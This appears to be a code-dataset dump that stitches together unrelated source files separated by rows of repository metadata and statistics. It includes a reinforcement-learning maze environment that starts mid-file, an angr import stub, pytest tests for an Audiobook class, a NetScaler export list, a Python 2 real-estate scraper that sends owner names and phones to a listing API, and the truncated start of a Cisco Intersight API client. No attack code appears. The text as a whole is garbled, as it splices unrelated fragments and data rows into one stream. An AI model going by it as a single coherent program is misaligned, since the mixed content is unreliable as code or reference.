self.seed((config.worker_index + 1) * (config.num_workers + 1))
def create_obs(self):
obs = np.zeros(MAZE_SHAPE)
obs[TRAP1_POS[0]][TRAP1_POS[1]] = TRAP_VALUE
obs[TRAP2_POS[0]][TRAP2_POS[1]] = TRAP_VALUE
obs[EXIT_POS[0]][EXIT_POS[1]] = EXIT_VALUE
obs[self.cur_pos[0]][self.cur_pos[1]] = POS_VALUE
return obs
def reset(self):
self.cur_pos = np.array([0, 0])
return self.create_obs()
def step(self, action):
done = False
reward = 0.0
# 0:up, 1:down, 2:left, 3:right
# if action == 0 and self.cur_pos[1] > 0:
# self.cur_pos[1] = self.cur_pos[1] - 1
# elif action == 1 and self.cur_pos[1] < MAZE_SIZE - 1:
# self.cur_pos[1] = self.cur_pos[1] + 1
# elif action == 2 and self.cur_pos[0] > 0:
# self.cur_pos[0] = self.cur_pos[0] - 1
# elif action == 3 and self.cur_pos[0] < MAZE_SIZE - 1:
# self.cur_pos[0] = self.cur_pos[0] + 1
if action == 0:
if self.cur_pos[0] > 0:
self.cur_pos[0] = self.cur_pos[0] - 1
else:
reward = -1.0
elif action == 1:
if self.cur_pos[0] < MAZE_SIZE - 1:
self.cur_pos[0] = self.cur_pos[0] + 1
else:
reward = -1.0
elif action == 2:
if self.cur_pos[1] > 0:
self.cur_pos[1] = self.cur_pos[1] - 1
else:
reward = -1.0
elif action == 3:
if self.cur_pos[1] < MAZE_SIZE - 1:
self.cur_pos[1] = self.cur_pos[1] + 1
else:
reward = -1.0
if (self.cur_pos == TRAP1_POS).all() or (self.cur_pos == TRAP2_POS).all():
done = True
reward = TRAP_VALUE
elif (self.cur_pos == EXIT_POS).all():
done = True
reward = EXIT_VALUE
return self.create_obs(), reward, done, {}
def seed(self, seed=None):
random.seed(seed)
# With the treasure added, PPO clearly outperforms DQN; DQN oscillates endlessly around local spots
class QuarkMaze3(gym.Env):
def __init__(self, config: EnvContext):
# 0:up, 1:down, 2:left, 3:right
self.action_space = Discrete(4)
self.observation_space = Box(TRAP_VALUE, TREASURE_VALUE, shape=MAZE_SHAPE, dtype=np.float32)
self.cur_pos = np.array([0, 0])
self.seed((config.worker_index + 1) * (config.num_workers + 1))
self.treasure_status = True
self.epoch_reward = 0
def create_obs(self):
obs = np.zeros(MAZE_SHAPE)
obs[TRAP1_POS[0]][TRAP1_POS[1]] = TRAP_VALUE
obs[TRAP2_POS[0]][TRAP2_POS[1]] = TRAP_VALUE
obs[EXIT_POS[0]][EXIT_POS[1]] = EXIT_VALUE
if self.treasure_status:
obs[TREASURE_POS[0]][TREASURE_POS[1]] = TREASURE_VALUE
obs[self.cur_pos[0]][self.cur_pos[1]] = POS_VALUE
return obs
    def reset(self):
        self.cur_pos = np.array([0, 0])
        self.treasure_status = True
        self.epoch_reward = 0
        return self.create_obs()
def step(self, action):
done = False
reward = 0.0
# 0:up, 1:down, 2:left, 3:right
# if action == 0 and self.cur_pos[1] > 0:
# self.cur_pos[1] = self.cur_pos[1] - 1
# elif action == 1 and self.cur_pos[1] < MAZE_SIZE - 1:
# self.cur_pos[1] = self.cur_pos[1] + 1
# elif action == 2 and self.cur_pos[0] > 0:
# self.cur_pos[0] = self.cur_pos[0] - 1
# elif action == 3 and self.cur_pos[0] < MAZE_SIZE - 1:
# self.cur_pos[0] = self.cur_pos[0] + 1
if action == 0:
if self.cur_pos[0] > 0:
self.cur_pos[0] = self.cur_pos[0] - 1
else:
reward = -1.0
elif action == 1:
if self.cur_pos[0] < MAZE_SIZE - 1:
self.cur_pos[0] = self.cur_pos[0] + 1
else:
reward = -1.0
elif action == 2:
if self.cur_pos[1] > 0:
self.cur_pos[1] = self.cur_pos[1] - 1
else:
reward = -1.0
elif action == 3:
if self.cur_pos[1] < MAZE_SIZE - 1:
self.cur_pos[1] = self.cur_pos[1] + 1
else:
reward = -1.0
if (self.cur_pos == TREASURE_POS).all() and self.treasure_status:
self.treasure_status = False
reward = TREASURE_VALUE
elif (self.cur_pos == TRAP1_POS).all() or (self.cur_pos == TRAP2_POS).all():
done = True
reward = TRAP_VALUE
elif (self.cur_pos == EXIT_POS).all():
done = True
reward = EXIT_VALUE
self.epoch_reward += reward
return self.create_obs(), reward, done, {}
def seed(self, seed=None):
random.seed(seed)
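The three `step()` methods above repeat the same clamped-move logic. A self-contained sketch of that shared rule (an illustrative refactor, not used by the classes above; grid size 4 is hard-coded here as an assumption matching `MAZE_SIZE`): the agent moves one cell in the chosen direction, or stays put with a -1.0 penalty when the move would leave the grid.

```python
def apply_move(pos, action, size=4):
    """Return (new_pos, penalty) for one move, clamping at the maze walls."""
    # action -> (row delta, col delta): 0:up, 1:down, 2:left, 3:right
    deltas = {0: (-1, 0), 1: (1, 0), 2: (0, -1), 3: (0, 1)}
    dr, dc = deltas[action]
    r, c = pos[0] + dr, pos[1] + dc
    if 0 <= r < size and 0 <= c < size:
        return (r, c), 0.0
    return (pos[0], pos[1]), -1.0  # bumped a wall: stay put, take -1 reward
```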
def test_env():
env_config = EnvContext({}, 0, num_workers=1)
env = QuarkMaze3(env_config)
obs = env.reset()
print(obs)
obs, reward, done, info = env.step(1)
print(obs, reward, done)
obs, reward, done, info = env.step(1)
print(obs, reward, done)
if __name__ == '__main__':
test_env()
| 33 | 100 | 0.528577 | 1,159 | 7,821 | 3.379638 | 0.072476 | 0.167986 | 0.23998 | 0.106714 | 0.836354 | 0.834057 | 0.834057 | 0.821802 | 0.820781 | 0.820781 | 0 | 0.056368 | 0.335379 | 7,821 | 236 | 101 | 33.139831 | 0.697191 | 0.167753 | 0 | 0.77907 | 0 | 0 | 0.001235 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.087209 | false | 0 | 0.02907 | 0 | 0.180233 | 0.017442 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8574a781d42bfc8186d262cf50911755fee91148 | 114 | py | Python | simuvex/simuvex/engines/vex/statements/dirty.py | Ruide/angr-dev | 964dc80c758e25c698c2cbcc454ef5954c5fa0a0 | [
"BSD-2-Clause"
] | 86 | 2015-08-06T23:25:07.000Z | 2022-02-17T14:58:22.000Z | simuvex/simuvex/engines/vex/statements/dirty.py | Ruide/angr-dev | 964dc80c758e25c698c2cbcc454ef5954c5fa0a0 | [
"BSD-2-Clause"
] | 132 | 2015-09-10T19:06:59.000Z | 2018-10-04T20:36:45.000Z | simuvex/simuvex/engines/vex/statements/dirty.py | Ruide/angr-dev | 964dc80c758e25c698c2cbcc454ef5954c5fa0a0 | [
"BSD-2-Clause"
] | 80 | 2015-08-07T10:30:20.000Z | 2020-03-21T14:45:28.000Z | print '... Importing simuvex/engines/vex/statements/dirty.py ...'
from angr.engines.vex.statements.dirty import *
"""
Unit Test Module for the class Audiobook in the audiofiles package
Test Framework: pyTest
"""
import pytest
import datetime
from audiofiles import Audiobook
from audiofiles import MetadataValueError
def test_Audiobook():
"""
**GIVEN** a valid metadata dictionary for Audiobook\n
**WHEN** a new Audiobook is created\n
**THEN** check the type of Audiobook attributes and their values.
"""
# Test for valid metadata
audiobook = Audiobook(metadata={"name": "sample-book", "duration": 45,
"author": "author1", "narrator": "narrator1"})
assert isinstance(audiobook.ID, int)
assert isinstance(audiobook.name, str)
assert isinstance(audiobook.author, str)
assert isinstance(audiobook.narrator, str)
assert isinstance(audiobook.duration, int)
assert isinstance(audiobook.metadata, dict)
assert isinstance(audiobook.uploadtime, datetime.datetime)
assert audiobook.ID == abs(hash(f"sample-book-45-{audiobook.uploadtime.isoformat()}"))
assert audiobook.name == "sample-book"
assert audiobook.author == "author1"
assert audiobook.narrator == "narrator1"
assert audiobook.duration == 45
assert audiobook.metadata['type'] == 'Audiobook'
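The ID assertion above implies the constructor derives the identifier from the name, duration, and upload timestamp. A minimal sketch of that scheme (the helper name `derive_audiobook_id` is hypothetical, not part of the audiofiles package):

```python
import datetime

def derive_audiobook_id(name, duration, uploadtime):
    # Hypothetical sketch of the ID scheme the assertion implies:
    # a non-negative hash of "<name>-<duration>-<ISO uploadtime>".
    return abs(hash("%s-%d-%s" % (name, duration, uploadtime.isoformat())))

uploadtime = datetime.datetime(2021, 1, 1)
book_id = derive_audiobook_id("sample-book", 45, uploadtime)
```

Because `hash()` of a string is salted per process, the resulting ID is only stable within a single run, which is consistent with the tests recomputing it from the instance's own `uploadtime`.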
def test_Audiobook_missing_metadata():
"""
**GIVEN** an invalid metadata dictionary for Audiobook that is missing a key\n
**WHEN** a new Audiobook is created\n
**THEN** check that the constructor raises a MetadataValueError with the appropriate error
"""
# Test for 'duration' field missing
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": "sample-book", "author": "author1", "narrator": "narrator1"})
assert str(error.value) == "metadata value is missing for 'duration'"
# Test for 'name' field missing
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"duration": 45, "author": "author1", "narrator": "narrator1"})
assert str(error.value) == "metadata value is missing for 'name'"
# Test for 'author' field missing
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"duration": 45, "name": "sample-book", "narrator": "narrator1"})
assert str(error.value) == "metadata value is missing for 'author'"
# Test for 'narrator' field missing
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"duration": 45, "name": "sample-book", "author": "author1"})
assert str(error.value) == "metadata value is missing for 'narrator'"
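The four cases above all expect the same message format. A sketch of the kind of check that would produce it (`check_required` and `REQUIRED_KEYS` are illustrative assumptions, not the actual audiofiles implementation):

```python
REQUIRED_KEYS = ("name", "duration", "author", "narrator")

class MetadataValueError(Exception):
    pass

def check_required(metadata):
    # Raise with the exact message format the tests assert on.
    for key in REQUIRED_KEYS:
        if key not in metadata:
            raise MetadataValueError("metadata value is missing for '%s'" % key)

# Demonstrate the 'duration' case used in the first test above.
err = None
try:
    check_required({"name": "sample-book", "author": "author1", "narrator": "narrator1"})
except MetadataValueError as exc:
    err = str(exc)
```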
def test_Audiobook_invalid_name():
"""
**GIVEN** an invalid metadata dict for Audiobook that has an invalid 'name' parameter\n
**WHEN** a new Audiobook is created\n
**THEN** check that the constructor raises a MetadataValueError with the appropriate error
"""
# Test for 'name' field not an str
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": 20, "author": "author1",
"duration": 45, "narrator": "narrator1"})
assert str(error.value) == "metadata value is invalid for 'name' - not an str"
# Test for 'name' field too long
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": "sample-book" * 20, "author": "author1",
"duration": 45, "narrator": "narrator1"})
assert str(error.value) == "metadata value is invalid for 'name' - str too long"
def test_Audiobook_invalid_duration():
"""
**GIVEN** an invalid metadata dict for Audiobook that has an invalid 'duration' parameter\n
**WHEN** a new Audiobook is created\n
**THEN** check that the constructor raises a MetadataValueError with the appropriate error
"""
# Test for 'duration' field not an int
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": "sample-book", "duration": 45.3,
"author": "author1", "narrator": "narrator1"})
assert str(error.value) == "metadata value is invalid for 'duration' - not an int"
# Test for 'duration' field not positive
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": "sample-book", "duration": -45,
"author": "author1", "narrator": "narrator1"})
assert str(error.value) == "metadata value is invalid for 'duration' - not positive"
def test_Audiobook_invalid_author():
"""
**GIVEN** an invalid metadata dict for Audiobook that has an invalid 'author' parameter\n
**WHEN** a new Audiobook is created\n
**THEN** check that the constructor raises a MetadataValueError with the appropriate error
"""
# Test for 'author' field not an str
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": "sample-book", "author": 1,
"duration": 45, "narrator": "narrator1"})
assert str(error.value) == "metadata value is invalid for 'author' - not an str"
# Test for 'author' field too long
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": "sample-book", "author": "author1" * 20,
"duration": 45, "narrator": "narrator1"})
assert str(error.value) == "metadata value is invalid for 'author' - str too long"
def test_Audiobook_invalid_narrator():
"""
**GIVEN** an invalid metadata dict for Audiobook that has an invalid 'narrator' parameter\n
**WHEN** a new Audiobook is created\n
**THEN** check that the constructor raises a MetadataValueError with the appropriate error
"""
# Test for 'narrator' field not an str
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": "sample-book", "author": "author1",
"duration": 45, "narrator": 1})
assert str(error.value) == "metadata value is invalid for 'narrator' - not an str"
# Test for 'narrator' field too long
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": "sample-book", "author": "author1",
"duration": 45, "narrator": "narrator1" * 20})
assert str(error.value) == "metadata value is invalid for 'narrator' - str too long"
def test_Audiobook_extra_uploadtime():
"""
**GIVEN** a metadata dictionary for Audiobook that has an 'uploadtime' parameter\n
**WHEN** a new Audiobook is created\n
**THEN** check that the constructor raises a MetadataValueError with the appropriate
error for invalid values and check attribute type and values for valid values
"""
# Test for valid 'uploadtime'
audiobook = Audiobook(metadata={"name": "sample-book", "duration": 45, "narrator": "narrator1",
"uploadtime": "2021-01-01", "author": "author1"})
assert isinstance(audiobook.ID, int)
assert isinstance(audiobook.name, str)
assert isinstance(audiobook.author, str)
assert isinstance(audiobook.narrator, str)
assert isinstance(audiobook.duration, int)
assert isinstance(audiobook.metadata, dict)
assert isinstance(audiobook.uploadtime, datetime.datetime)
assert audiobook.ID == abs(hash(f"sample-book-45-2021-01-01T00:00:00"))
assert audiobook.name == "sample-book"
assert audiobook.author == "author1"
assert audiobook.narrator == "narrator1"
assert audiobook.duration == 45
assert audiobook.uploadtime == datetime.datetime.fromisoformat("2021-01-01")
# Test for 'uploadtime' not an str
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": "sample-song", "duration": 45, "author": "author1",
"uploadtime": 3453, "narrator": "narrator1"})
assert str(error.value) == "metadata value is invalid for 'uploadtime' - not an str"
# Test for 'uploadtime' not an ISO8601 string
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": "sample-song", "duration": 45, "author": "author1",
"uploadtime": "3453", "narrator": "narrator1"})
assert str(error.value) == "metadata value is invalid for 'uploadtime' - not ISO8601"
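The two failure cases above suggest a two-step check: first the type, then an ISO 8601 parse. A hedged sketch (`parse_uploadtime` is a hypothetical helper; the real constructor's logic may differ):

```python
import datetime

def parse_uploadtime(value):
    # Type check first, mirroring the "not an str" message above.
    if not isinstance(value, str):
        raise ValueError("metadata value is invalid for 'uploadtime' - not an str")
    # Then delegate ISO 8601 validation to the standard library.
    try:
        return datetime.datetime.fromisoformat(value)
    except ValueError:
        raise ValueError("metadata value is invalid for 'uploadtime' - not ISO8601")

parsed = parse_uploadtime("2021-01-01")
```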
def test_Audiobook_extra_ID():
"""
**GIVEN** a metadata dictionary for Audiobook that has an 'ID' parameter\n
**WHEN** a new Audiobook is created\n
**THEN** check that the constructor raises a MetadataValueError with the appropriate
error for invalid values and check attribute type and values for valid values
"""
# Test for valid '_id'
audiobook = Audiobook(metadata={"name": "sample-book", "duration": 45, "_id": 23214241,
"author": "author1", "narrator": "narrator1"})
assert isinstance(audiobook.ID, int)
assert isinstance(audiobook.name, str)
assert isinstance(audiobook.author, str)
assert isinstance(audiobook.narrator, str)
assert isinstance(audiobook.duration, int)
assert isinstance(audiobook.metadata, dict)
assert isinstance(audiobook.uploadtime, datetime.datetime)
assert audiobook.ID == 23214241
assert audiobook.name == "sample-book"
assert audiobook.author == "author1"
assert audiobook.narrator == "narrator1"
assert audiobook.duration == 45
# Test for '_id' not an int
with pytest.raises(MetadataValueError) as error:
Audiobook(metadata={"name": "sample-song", "duration": 45, "_id": "3453",
"author": "author1", "narrator": "narrator1"})
assert str(error.value) == "metadata value is invalid for '_id' - not an int"
def test_Audiobook_extra_type():
"""
**GIVEN** a metadata dictionary for Audiobook that has a 'type' parameter\n
**WHEN** a new Audiobook is created\n
**THEN** check that the constructor raises a MetadataValueError with the appropriate
error for invalid values and check attribute type and values for valid values
"""
# Test Case 1 - valid 'Audiobook' type
audiobook = Audiobook(metadata={"name": "sample-book", "duration": 45, "type": "Audiobook",
"author": "author1", "narrator": "narrator1"})
assert isinstance(audiobook.ID, int)
assert isinstance(audiobook.name, str)
assert isinstance(audiobook.author, str)
assert isinstance(audiobook.narrator, str)
assert isinstance(audiobook.duration, int)
assert isinstance(audiobook.metadata, dict)
assert isinstance(audiobook.uploadtime, datetime.datetime)
assert audiobook.ID == abs(hash(f"sample-book-45-{audiobook.uploadtime.isoformat()}"))
assert audiobook.name == "sample-book"
assert audiobook.author == "author1"
assert audiobook.narrator == "narrator1"
assert audiobook.duration == 45
assert isinstance(audiobook.metadata['type'], str)
assert audiobook.metadata['type'] == "Audiobook"
# Test Case 2 - invalid 'Album' type - Audiobook() will overwrite
audiobook = Audiobook(metadata={"name": "sample-book", "duration": 45, "type": "Album",
"author": "author1", "narrator": "narrator1"})
assert isinstance(audiobook.ID, int)
assert isinstance(audiobook.name, str)
assert isinstance(audiobook.author, str)
assert isinstance(audiobook.narrator, str)
assert isinstance(audiobook.duration, int)
assert isinstance(audiobook.metadata, dict)
assert isinstance(audiobook.uploadtime, datetime.datetime)
assert audiobook.ID == abs(hash(f"sample-book-45-{audiobook.uploadtime.isoformat()}"))
assert audiobook.name == "sample-book"
assert audiobook.author == "author1"
assert audiobook.narrator == "narrator1"
assert audiobook.duration == 45
assert isinstance(audiobook.metadata['type'], str)
assert audiobook.metadata['type'] == "Audiobook"
# Test Case 3 - invalid value and type 3423 - Audiobook() will overwrite
audiobook = Audiobook(metadata={"name": "sample-book", "duration": 45, "type": 3423,
"author": "author1", "narrator": "narrator1"})
assert isinstance(audiobook.ID, int)
assert isinstance(audiobook.name, str)
assert isinstance(audiobook.author, str)
assert isinstance(audiobook.narrator, str)
assert isinstance(audiobook.duration, int)
assert isinstance(audiobook.metadata, dict)
assert isinstance(audiobook.uploadtime, datetime.datetime)
assert audiobook.ID == abs(hash(f"sample-book-45-{audiobook.uploadtime.isoformat()}"))
assert audiobook.name == "sample-book"
assert audiobook.author == "author1"
assert audiobook.narrator == "narrator1"
assert audiobook.duration == 45
assert isinstance(audiobook.metadata['type'], str)
assert audiobook.metadata['type'] == "Audiobook"
__all__ = ['rewriteaction', 'rewriteglobal_binding', 'rewriteglobal_rewritepolicy_binding', 'rewriteparam', 'rewritepolicy', 'rewritepolicy_binding', 'rewritepolicy_csvserver_binding', 'rewritepolicy_lbvserver_binding', 'rewritepolicy_rewriteglobal_binding', 'rewritepolicy_rewritepolicylabel_binding', 'rewritepolicylabel', 'rewritepolicylabel_binding', 'rewritepolicylabel_policybinding_binding', 'rewritepolicylabel_rewritepolicy_binding']
#coding=UTF-8
'''
Created on 2011-7-13
@author: Administrator
'''
import urllib
import urllib2,time
from jjrlog import msglogger
def postHost(res):
    # print "*"*40
    if res and res['house_title']:
        req = urllib2.Request("http://my.lianxiao.com/Manage/houseApi?" + urllib.urlencode(res))
        br = urllib2.build_opener()
        try:
            p = br.open(req).read().strip()
        except Exception, eeer:
            print "postHost Exception %s" % eeer
            p = None
        rs = p
        # if p != None:
        #     rs = unicode(p, "GB18030", errors="ignore")
        try:
            msglogger.debug("%s---->%s" % (res, rs))
        except:
            print "Exception -------->%s" % res
        return rs
def postHost1(res):
    if res is None:
        return
    req = urllib2.Request("http://my.lianxiao.com/manage/houseApi", urllib.urlencode(res))
    br = urllib2.build_opener()
    try:
        p = br.open(req).read().strip()
    except:
        p = None
    rs = ""
    if p != None:
        rs = unicode(p, "GB18030", errors="ignore")
    try:
        msglogger.debug("%s---->%s" % (res, rs))
    except:
        print "Exception -------->%s" % res
    return rs
def printRsult(data, kind):
    print "++++++++++++++++++++++++++++++++++++"
    """
    For-sale / wanted-to-buy records have no house_deposit (deposit) key.
    For-rent / wanted-to-rent records have no house_belong (ownership) key.
    For-sale / for-rent records have no house_price_max / house_area_max keys.
    Wanted-to-buy / wanted-to-rent records carry both house_price_max and house_area_max.

    If the scraped price reads "0-2000" or "2000 and below", then:
        house_price = 0
        house_price_max = 2000
    If the scraped price reads "2000-3000", then:
        house_price = 2000
        house_price_max = 3000
    If the scraped price reads "3000 and above", then:
        house_price = 3000
        house_price_max = 0
    Area follows the same convention as price.
    """
    if kind == "1":  # for sale
        print 'house_flag' + data['house_flag'],  # listing type INTEGER 1: sale 2: rent 3: wanted-to-buy 4: wanted-to-rent
        print 'borough_name' + data['borough_name']  # neighborhood name VARCHAR, not null
        print 'house_addr' + data['house_addr']  # address VARCHAR
        print 'house_title' + data['house_title']  # title VARCHAR, not null
        print 'house_city' + data['house_city'],  # city VARCHAR, not null, e.g. Suzhou
        print 'house_region' + data['house_region']  # district VARCHAR, not null
        print 'house_section' + data['house_section']  # sub-area VARCHAR
        print 'house_type' + data['house_type']  # property type INTEGER
        print 'house_price' + data['house_price']  # price FLOAT, not null, default 0
        print 'house_area' + data['house_area']  # area FLOAT
        print 'house_room' + data['house_room']  # rooms INTEGER
        print 'house_hall' + data['house_hall']  # halls INTEGER
        print 'house_toilet' + data['house_toilet']  # bathrooms INTEGER
        print 'house_veranda' + data['house_veranda']  # balconies INTEGER
        print 'house_topfloor' + data['house_topfloor']  # total floors INTEGER
        print 'house_floor' + data['house_floor']  # floor INTEGER
        print 'house_age' + data['house_age']  # build year INTEGER, four digits, e.g. 2001; "8 years old" becomes 2011-8 = 2003
        print 'house_toward' + data['house_toward']  # orientation INTEGER
        print 'house_fitment' + data['house_fitment']  # renovation INTEGER
        print 'house_feature' + data['house_feature']  # features VARCHAR, comma-separated dict keys, e.g. 1,2,3
        print 'house_belong' + data['house_belong']  # ownership INTEGER
        print 'house_desc' + data['house_desc']  # description VARCHAR
        print 'owner_name' + data['owner_name']  # owner name VARCHAR
        print 'owner_phone' + data['owner_phone']  # owner phone VARCHAR; digits on SouFun, required there
        print 'owner_phone_pic' + data['owner_phone_pic']  # owner phone image VARCHAR; image URL on 58/Ganji, required
        print 'house_posttime' + data['house_posttime']  # post time VARCHAR, unix timestamp; defaults to now if not scraped
    elif kind == "2":  # for rent
        print 'house_flag' + data['house_flag'],  # listing type INTEGER 1: sale 2: rent 3: wanted-to-buy 4: wanted-to-rent
        print 'borough_name' + data['borough_name']  # neighborhood name VARCHAR, not null
        print 'house_addr' + data['house_addr']  # address VARCHAR
        print 'house_title' + data['house_title']  # title VARCHAR, not null
        print 'house_city' + data['house_city'],  # city VARCHAR, not null, e.g. Suzhou
        print 'house_region' + data['house_region']  # district VARCHAR, not null
        print 'house_section' + data['house_section']  # sub-area VARCHAR
        print 'house_type' + data['house_type']  # property type INTEGER
        print 'house_price' + data['house_price']  # price FLOAT, not null, default 0
        print 'house_area' + data['house_area']  # area FLOAT
        print 'house_deposit' + data['house_deposit']  # payment terms INTEGER
        print 'house_room' + data['house_room']  # rooms INTEGER
        print 'house_hall' + data['house_hall']  # halls INTEGER
        print 'house_toilet' + data['house_toilet']  # bathrooms INTEGER
        print 'house_veranda' + data['house_veranda']  # balconies INTEGER
        print 'house_topfloor' + data['house_topfloor']  # total floors INTEGER
        print 'house_floor' + data['house_floor']  # floor INTEGER
        print 'house_age' + data['house_age']  # build year INTEGER, four digits, e.g. 2001; "8 years old" becomes 2011-8 = 2003
        print 'house_toward' + data['house_toward']  # orientation INTEGER
        print 'house_fitment' + data['house_fitment']  # renovation INTEGER
        print 'house_feature' + data['house_feature']  # features VARCHAR, comma-separated dict keys, e.g. 1,2,3
        print 'house_desc' + data['house_desc']  # description VARCHAR
        print 'owner_name' + data['owner_name']  # owner name VARCHAR
        print 'owner_phone' + data['owner_phone']  # owner phone VARCHAR; digits on SouFun, required there
        print 'owner_phone_pic' + data['owner_phone_pic']  # owner phone image VARCHAR; image URL on 58/Ganji, required
        print 'house_posttime' + data['house_posttime']  # post time VARCHAR, unix timestamp; defaults to now if not scraped
    elif kind == "3":  # wanted to buy
        print 'house_flag' + data['house_flag'],  # listing type INTEGER 1: sale 2: rent 3: wanted-to-buy 4: wanted-to-rent
        print 'borough_name' + data['borough_name']  # neighborhood name VARCHAR, not null
        print 'house_addr' + data['house_addr']  # address VARCHAR
        print 'house_title' + data['house_title']  # title VARCHAR, not null
        print 'house_city' + data['house_city'],  # city VARCHAR, not null, e.g. Suzhou
        print 'house_region' + data['house_region']  # district VARCHAR, not null
        print 'house_section' + data['house_section']  # sub-area VARCHAR
        print 'house_type' + data['house_type']  # property type INTEGER
        print 'house_price' + data['house_price']  # price FLOAT, not null, default 0
        print 'house_price_max' + data['house_price_max']  # max price FLOAT, not null, default 0
        print 'house_area' + data['house_area']  # area FLOAT, default 0
        print 'house_area_max' + data['house_area_max']  # max area FLOAT, default 0
        print 'house_room' + data['house_room']  # rooms INTEGER; if non-numeric, comma-separated, e.g. 1,2,3
        print 'house_hall' + data['house_hall']  # halls INTEGER
        print 'house_toilet' + data['house_toilet']  # bathrooms INTEGER
        print 'house_veranda' + data['house_veranda']  # balconies INTEGER
        print 'house_topfloor' + data['house_topfloor']  # total floors INTEGER
        print 'house_floor' + data['house_floor']  # floor INTEGER
        print 'house_age' + data['house_age']  # build year INTEGER, four digits, e.g. 2001; "8 years old" becomes 2011-8 = 2003
        print 'house_toward' + data['house_toward']  # orientation INTEGER
        print 'house_fitment' + data['house_fitment']  # renovation INTEGER
        print 'house_feature' + data['house_feature']  # features VARCHAR, comma-separated dict keys, e.g. 1,2,3
        print 'house_belong' + data['house_belong']  # ownership INTEGER
        print 'house_desc' + data['house_desc']  # description VARCHAR
        print 'owner_name' + data['owner_name']  # owner name VARCHAR
        print 'owner_phone' + data['owner_phone']  # owner phone VARCHAR; digits on SouFun, required there
        print 'owner_phone_pic' + data['owner_phone_pic']  # owner phone image VARCHAR; image URL on 58/Ganji, required
        print 'house_posttime' + data['house_posttime']  # post time VARCHAR, unix timestamp; defaults to now if not scraped
    elif kind == "4":  # wanted to rent
        print 'house_flag' + data['house_flag'],  # listing type INTEGER 1: sale 2: rent 3: wanted-to-buy 4: wanted-to-rent
        print 'borough_name' + data['borough_name']  # neighborhood name VARCHAR, not null
        print 'house_addr' + data['house_addr']  # address VARCHAR
        print 'house_title' + data['house_title']  # title VARCHAR, not null
        print 'house_city' + data['house_city'],  # city VARCHAR, not null, e.g. Suzhou
        print 'house_region' + data['house_region']  # district VARCHAR, not null
        print 'house_section' + data['house_section']  # sub-area VARCHAR
        print 'house_type' + data['house_type']  # property type INTEGER
        print 'house_price' + data['house_price']  # price FLOAT, not null, default 0
        print 'house_price_max' + data['house_price_max']  # max price FLOAT, not null, default 0
        print 'house_area' + data['house_area']  # area FLOAT, default 0
        print 'house_area_max' + data['house_area_max']  # max area FLOAT, default 0
        print 'house_deposit' + data['house_deposit']  # payment terms INTEGER
        print 'house_room' + data['house_room']  # rooms VARCHAR; if non-numeric, comma-separated, e.g. 1,2,3
        print 'house_hall' + data['house_hall']  # halls INTEGER
        print 'house_toilet' + data['house_toilet']  # bathrooms INTEGER
        print 'house_veranda' + data['house_veranda']  # balconies INTEGER
        print 'house_topfloor' + data['house_topfloor']  # total floors INTEGER
        print 'house_floor' + data['house_floor']  # floor INTEGER
        print 'house_age' + data['house_age']  # build year INTEGER, four digits, e.g. 2001; "8 years old" becomes 2011-8 = 2003
        print 'house_toward' + data['house_toward']  # orientation INTEGER
        print 'house_fitment' + data['house_fitment']  # renovation INTEGER
        print 'house_feature' + data['house_feature']  # features VARCHAR, comma-separated dict keys, e.g. 1,2,3
        print 'house_desc' + data['house_desc']  # description VARCHAR
        print 'owner_name' + data['owner_name']  # owner name VARCHAR
        print 'owner_phone' + data['owner_phone']  # owner phone VARCHAR; digits on SouFun, required there
        print 'owner_phone_pic' + data['owner_phone_pic']  # owner phone image VARCHAR; image URL on 58/Ganji, required
        print 'house_posttime' + data['house_posttime']  # post time VARCHAR, unix timestamp; defaults to now if not scraped
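The min/max convention described in the docstring above can be sketched as a small parser (written in Python 3 for clarity, unlike the Python 2 module it annotates; `parse_range` is illustrative and not part of this spider):

```python
def parse_range(text):
    """Map a scraped price/area string onto the (min, max) convention:
    "0-2000" or "2000以下" -> (0, 2000)
    "2000-3000"           -> (2000, 3000)
    "3000以上"            -> (3000, 0)
    """
    text = text.strip()
    if text.endswith("以下"):   # "... and below": min is 0
        return 0, int(text[:-2])
    if text.endswith("以上"):   # "... and above": max is 0
        return int(text[:-2]), 0
    low, _, high = text.partition("-")
    return int(low), int(high or 0)
```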
# coding: utf-8
"""
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. # noqa: E501
The version of the OpenAPI document: 1.0.9-1295
Contact: intersight@cisco.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from intersight.api_client import ApiClient
from intersight.exceptions import (ApiTypeError, ApiValueError)
class AdapterApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_adapter_config_policy(self, adapter_config_policy,
**kwargs): # noqa: E501
"""Create a 'adapter.ConfigPolicy' resource. # noqa: E501
